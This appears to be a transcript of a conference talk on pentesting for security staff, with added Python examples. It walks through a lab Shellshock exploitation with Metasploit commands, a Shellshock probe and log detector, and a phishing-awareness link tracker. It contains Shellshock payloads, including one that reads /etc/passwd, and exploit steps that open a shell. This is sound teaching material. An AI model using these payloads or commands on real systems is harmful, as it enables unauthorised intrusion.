1. ANATOMY OF A PENTEST:
PROACTIVE STEPS TO ADDRESS
VULNERABILITIES IN YOUR NETWORK
Presenter: Robbie Corley
Robbie.Corley@KCTCS.EDU
Organization: KCTCS
Senior Information Security Analyst
2. Personal Life / Interests
• Married
• Bachelor’s in Music Business???
• Favorite Show: Seinfeld
• Favorite Movie(s): Lord of the Rings / Hobbit Trilogy
• Favorite Aspects of IT Security:
• Reverse Engineering / Studying Shellcode
• Finding and Exploiting Software Vulnerabilities
ABOUT ME
3. What is a pentest?
• A pentest is a simulated attack against a system to
prove or disprove the existence of vulnerabilities
previously detected by a vulnerability scan.
How does it work?
• You are the attacker:
• You will use exploits custom tailored to target
specific flagged vulnerabilities from your
previous vulnerability scan
LET’S TALK ABOUT PENTESTING
4. Some history on Pentesting…
• Pentesting originally meant manually compiling each individual exploit to test a
vulnerability; the exploits were usually written in different programming languages
and were specific to OS builds (XP SP1, XP SP2, etc.)
What’s the advantage over a Vulnerability Scan and why conduct one?
• A Vulnerability Scan merely lays out the foundation for your
network risk assessment
• A Pentest helps you fortify your network by discovering and
patching security holes before the attackers do and keeps your
auditors happy, which also keeps your boss happy
• Pentesting “weeds out” false positives from a Vulnerability Scan
while also validating vulnerabilities
LET’S TALK ABOUT PENTESTING
5. • Our Goal: To Scan and Validate vulnerabilities in a simulated environment to
demonstrate the effectiveness of a Pentest
• Recommended Vendor: Rapid7 (being a PCI Approved Scanning Vendor is an added plus)
• Other recommendations: Tenable Nessus
• Open Source: OpenVAS
• Why Rapid7?
• Exploit modules ship ready to use with the framework, so you do not need to go online
to search for them: readily available, built into the software
• Scanner and pentesting software are both free to try
• Software Resources Used:
• Nexpose Vulnerability Scan Solution
• Metasploit Pentesting Solution
CONDUCTING YOUR FIRST PENTEST
6. • Breakdown: Your boss has requested a blind vulnerability/pentest
assessment for your HVAC network
• Attack Vectors used: Client Side and Web
• A Blind Scan?
• A blind scan/pentest is an uncredentialed one: you scan and attack the network without
supplying any known credentials, which mimics what a real outside attacker sees. (It
will also miss findings only a credentialed scan can see, such as missing local patches.)
•HVAC Network Layout:
• HVAC A: Windows XP for server HVAC software:
• 192.168.56.101
• HVAC B: Linux Web Server for HVAC Web Services
• 192.168.56.102
HVAC SYSTEM SCAN & PENTEST
SIMULATION
7. HVAC SERVER A: SCAN SIMULATION
Vulnerability scan results (Nexpose) for HVAC A, the HVAC console server: IP 192.168.56.101, OS Windows XP
[Scan results screenshot not reproduced]
8. HVAC SERVER A: PENTEST SIMULATION
Pentest live demo (Metasploit) against HVAC A, the HVAC console server: IP 192.168.56.101, OS Windows XP
[Live demo; no slide content]
9. HVAC SERVER B: SCAN SIMULATION
Vulnerability scan results (Nexpose) for HVAC B, the HVAC web server: IP 192.168.56.102, OS Linux
[Scan results screenshot not reproduced]
Scan highlight: Shellshock (CVE-2014-6271) in the web server's bash CGI handling!
10. HVAC SERVER B: PENTEST SIMULATION
Pentest live demo (Metasploit) against HVAC B, the HVAC web server: IP 192.168.56.102, OS Linux
[Live demo; no slide content]
11. PENTEST SHELL COMMANDS USED
Commands used for future reference:
To pull up the console from the web UI, press Alt + Tilde (“~”), then:
• “use exploit/multi/http/apache_mod_cgi_bash_env_exec” (the Shellshock exploit module)
• “set RHOST 192.168.56.102” (our victim box’s IP address)
• “set TARGETURI /cgi-bin/status” (path to the vulnerable CGI script)
• “set PAYLOAD linux/x86/meterpreter/bind_tcp” (the payload the exploit delivers; a bind
payload listens on the victim, so your attacking host must be able to reach that port
through any firewall, otherwise use a reverse_tcp payload and set LHOST to your own IP)
• “run”
Once inside the compromised victim’s Meterpreter session, you can open a shell by simply
typing “shell”. You will then be greeted with a Linux shell.
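The scanner said “Shellshock” and the Metasploit module confirmed it. The script below is an added example, not code from the presentation, from Nexpose or from Metasploit, showing how to validate such a finding by hand (the same marker-echo test the module’s check command performs before you run it) and how the probe shows up on the blue-team side. The target URL and CGI path are taken from the HVAC B scenario above; the marker, the log lines and the local bash test are constructed for illustration.

```python
"""Manually validating a Shellshock (CVE-2014-6271) scanner finding.

Added example for this write-up; it is not code from the presentation,
from Nexpose or from Metasploit. TARGET comes from the slide scenario
(HVAC B); the marker and SAMPLE_LOG lines are constructed.
"""
import re
import secrets
import subprocess
import urllib.error
import urllib.request

TARGET = "http://192.168.56.102/cgi-bin/status"  # HVAC B, from the slides


def build_probe_header(marker: str) -> str:
    """Header value a vulnerable bash parses as a function definition followed
    by commands. mod_cgi copies User-Agent into HTTP_USER_AGENT, and the
    Content-Type line plus blank line keep the CGI response well formed so the
    marker comes back in the body."""
    return "() { :; }; echo Content-Type: text/plain; echo; echo " + marker


def looks_vulnerable(body: str, marker: str) -> bool:
    """True when the response echoes our marker on a line of its own, which
    only happens if the commands after the function body were executed."""
    return re.search(r"(?m)^" + re.escape(marker) + r"\s*$", body) is not None


def probe(url: str = TARGET, timeout: float = 5.0) -> dict:
    """Send the probe and report the verdict. Network call, not run by the test."""
    marker = "shellshock-" + secrets.token_hex(6)
    req = urllib.request.Request(url, headers={"User-Agent": build_probe_header(marker)})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # a 500 can still carry the echoed marker
        body = err.read().decode("utf-8", "replace")
    return {"url": url, "marker": marker, "vulnerable": looks_vulnerable(body, marker)}


def local_bash_vulnerable(bash: str = "bash"):
    """Classic local check on a host you can log in to: export a crafted
    variable and see whether its trailing command runs when bash starts.
    Returns None when no bash binary is available."""
    try:
        out = subprocess.run(
            [bash, "-c", "echo probe-done"],
            env={"x": "() { :; }; echo shellshock-vulnerable", "PATH": "/usr/bin:/bin"},
            capture_output=True, text=True, timeout=5,
        )
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return "shellshock-vulnerable" in out.stdout


# Blue-team side: the probe an attacker (or your pentest) sends lands in the
# web server's access log. Constructed Apache combined-format lines:
SAMPLE_LOG = [
    '192.168.56.1 - - [10/Oct/2014:13:55:36 +0000] "GET /cgi-bin/status HTTP/1.1" 200 312 "-" "() { :; }; /bin/bash -c \'cat /etc/passwd\'"',
    '192.168.56.50 - - [10/Oct/2014:13:56:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 312 "-" "Mozilla/5.0 (Windows NT 5.1)"',
    '192.168.56.1 - - [10/Oct/2014:13:57:12 +0000] "GET /cgi-bin/status HTTP/1.1" 500 603 "-" "() {:;}; echo Content-Type: text/plain; echo; echo shellshock-abc123"',
]
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")  # the function-definition prefix bash looks for


def find_shellshock_attempts(lines):
    """Return (client_ip, user_agent) for every log line carrying the prefix."""
    hits = []
    for line in lines:
        if SHELLSHOCK_RE.search(line):
            ip = line.split(" ", 1)[0]
            ua = line.rsplit('"', 2)[1]
            hits.append((ip, ua))
    return hits


if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_vulnerable())
    for ip, ua in find_shellshock_attempts(SAMPLE_LOG):
        print("shellshock attempt from", ip, "->", ua)
```

Run probe() against the lab box only; a positive result is what turns a scanner line into a validated finding, and the log search is what the HVAC web server’s owner should expect to see in their Apache access log after the test.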
12. • Why have User Awareness Training?
• Users can be more mindful of simple operations that can effectively
help keep their documents and data safe
• We simply cannot monitor all of our users’ actions
• Attackers recognize well-structured network security and seek out
easier pathways of entry, e.g. a phishing email directed at an
unsuspecting, untrained user
• On a personal note: Training gives our users a boost of confidence,
knowing they are collectively making a difference in keeping themselves
and the company more secure
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING MODULES
13. • How does it work?
• Phishing Modules use pre-made email templates
that resemble common Phishing emails in the wild
• Emails can be tailored to re-direct users to
informative phishing awareness videos upon the
user interacting with a phishing email
• What tools do I need?
• Easiest solution and what we will be using:
SPTOOLKIT
• SPTOOLKIT is open source and requires little
effort to set up
• Rapid7’s Metasploit Pentesting Software also
includes a Social Engineering module with a pro
license
USER AWARENESS TRAINING
PENTESTING USING SOCIAL
ENGINEERING PHISHING MODULES
14. • Demo time!
• Link: https://github.com/sptoolkit/sptoolkit
• Requirements:
• SMTP server
• Any Linux OS box with Apache and
MySQL installed
• Recommended approach: Install
Kali Linux, which has Apache and
MySQL installed by default (the
services are not started automatically,
hence the commands below)
• http://www.kali.org/downloads/
• Commands to start MySQL and Apache:
• service apache2 start
• service mysql start
USER AWARENESS TRAINING
PHISHING AROUND WITH SPTOOLKIT
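SPTOOLKIT’s job on the day is to record which users interacted with the phishing email and to send them on to the awareness video. The following is an added example (not SPTOOLKIT’s code, which has its own database and templates) of the core of that tracking: a per-recipient link whose token is an HMAC over campaign and address, so nobody can guess or forge a colleague’s link, and a click report built from the landing page’s Apache access log. The secret, landing URL, recipients and log lines are constructed for illustration.

```python
"""Per-recipient tracking links for a phishing awareness campaign.

Added example; this is not SPTOOLKIT's code and does not use its database
or templates. CAMPAIGN_SECRET, LANDING_PAGE, the recipients and the log
lines below are constructed for illustration.
"""
import base64
import hashlib
import hmac
import re
from urllib.parse import parse_qs, urlencode, urlparse

CAMPAIGN_SECRET = b"per-campaign-secret-load-from-config"  # assumption
LANDING_PAGE = "https://awareness.example.internal/video"    # assumption


def make_token(email, campaign_id, secret=CAMPAIGN_SECRET):
    """Unguessable per-recipient token: HMAC-SHA256 over (campaign, address),
    truncated to 96 bits and URL-safe base64 encoded (16 chars, no padding)."""
    msg = f"{campaign_id}|{email.lower()}".encode()
    mac = hmac.new(secret, msg, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac[:12]).decode().rstrip("=")


def tracking_url(email, campaign_id):
    """Link to embed in that recipient's phishing email."""
    return LANDING_PAGE + "?" + urlencode({"c": campaign_id, "t": make_token(email, campaign_id)})


def resolve_token(token, campaign_id, recipients):
    """Map a clicked token back to a recipient; constant-time comparison so a
    forged token leaks nothing about which guess was 'closest'."""
    for email in recipients:
        if hmac.compare_digest(make_token(email, campaign_id), token):
            return email
    return None


ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3})'
)


def click_report(log_lines, campaign_id, recipients):
    """Walk the landing page's access log and credit each user's first click."""
    clicked = {}
    unattributed = 0
    for line in log_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        query = parse_qs(urlparse(m["path"]).query)
        if query.get("c") != [campaign_id]:
            continue  # other campaign, favicon, stray hits
        who = resolve_token(query.get("t", [""])[0], campaign_id, recipients)
        if who is None:
            unattributed += 1        # forged or mangled token: count, do not credit
        elif who not in clicked:
            clicked[who] = m["ts"]   # first click only; repeat clicks are not double counted
    rate = len(clicked) / len(recipients) if recipients else 0.0
    return {"clicked": clicked, "unattributed": unattributed, "click_rate": rate}


# Constructed campaign and Apache combined-format log lines for the demo.
CAMPAIGN = "2015-q1-hvac-invoice"
RECIPIENTS = ["alice@example.com", "bob@example.com", "carol@example.com", "dave@example.com"]


def landing_path(email):
    u = urlparse(tracking_url(email, CAMPAIGN))
    return u.path + "?" + u.query


def sample_log_line(ip, ts, path, status=200):
    return f'{ip} - - [{ts}] "GET {path} HTTP/1.1" {status} 1042 "-" "Mozilla/5.0"'


SAMPLE_LOG = [
    sample_log_line("10.1.2.3", "12/Jan/2015:09:14:02 +0000", landing_path("alice@example.com")),
    sample_log_line("10.1.2.3", "12/Jan/2015:09:14:05 +0000", "/favicon.ico", 404),
    sample_log_line("10.1.4.9", "12/Jan/2015:09:20:41 +0000", landing_path("carol@example.com")),
    sample_log_line("10.1.4.9", "12/Jan/2015:11:02:17 +0000", landing_path("carol@example.com")),
    sample_log_line("10.1.7.7", "12/Jan/2015:13:45:00 +0000", "/video?c=" + CAMPAIGN + "&t=AAAAAAAAAAAAAAAA"),
]

if __name__ == "__main__":
    for r in RECIPIENTS:
        print(r, "->", tracking_url(r, CAMPAIGN))
    print(click_report(SAMPLE_LOG, CAMPAIGN, RECIPIENTS))
```

Keep the secret per campaign and rotate it afterwards; with a fixed secret an old link would stay valid forever, and the report would keep attributing clicks long after the training video has been watched.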
16. THAT’S ALL FOLKS
This presentation and its supplemental video and software content
can be downloaded by using the following link:
http://tinyurl.com/l46flvo (Secure Google-Drive repository)
Links to Resources outside of this repository:
SPTOOLKIT Setup Guide:
http://www.dafthack.com/blog/howtospearphishyouremployeespart1thesetup
www.rapid7.com -> download Community edition of Metasploit and Nexpose
http://www.kali.org/downloads/ -> Kali Linux to be used as a pentesting
environment and for SPTOOLKIT Social Engineering Module
Want to chat with me outside of this conference about more IT Security topics?
Shoot me an email at:
Robbie.Corley@kctcs.edu